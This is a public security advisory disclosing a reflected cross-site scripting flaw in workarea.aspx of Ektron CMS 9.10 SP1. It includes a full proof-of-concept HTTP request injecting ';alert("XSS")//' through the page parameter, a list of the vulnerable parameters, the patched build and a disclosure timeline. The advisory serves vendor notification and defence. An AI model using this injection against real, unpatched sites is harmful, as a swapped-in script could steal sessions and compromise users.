Ektron CMS 9.10 SP1 - XSS Vulnerability

# Vulnerability type: Cross-site Scripting
# Vendor: http://www.ektron.com/
# Product: Ektron Content Management System
# Affected version: =< 9.10 SP1 (Build 9.1.0.184.1.102)
# Patched version: 9.10 SP1 (Build 9.1.0.184.1.114)
# Credit: Jerold Hoong

# PROOF OF CONCEPT (XSS)

Cross-site scripting (XSS) vulnerability in workarea.aspx in Ektron CMS 9.10 SP1
on build 9.1.0.184.1.102 and earlier allows remote authenticated users to inject
arbitrary javascript via the page, action, folder_id and LangType parameters.

GET /Test/WorkArea/workarea.aspx?page=content.aspx%27%3balert
%28%22XSS%22%29%2f%2f&action=
ViewContentByCategory&folder_id=0
&LangType=1033 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
.. [SNIP] ...
Cookie: EktGUID=014949ec-36ac-4b89-9c0b-8b03ed29b0ed; EkAnalytics=0;
ASP.NET_SessionId=zxucmt5zyugbtwrm4vseakw5;
.. [SNIP] ...

# VULNERABLE PARAMETERS:
- page
- action
- folder_id
- LangType

# SAMPLE PAYLOAD
- ';alert("XSS")//

# TIMELINE
– 07/04/2015: Vulnerability found
– 07/04/2015: Vendor informed
– 08/04/2015: Vendor responded and acknowledged
– 28/05/2015: Vendor fixed the issue
– 31/05/2015: Public disclosure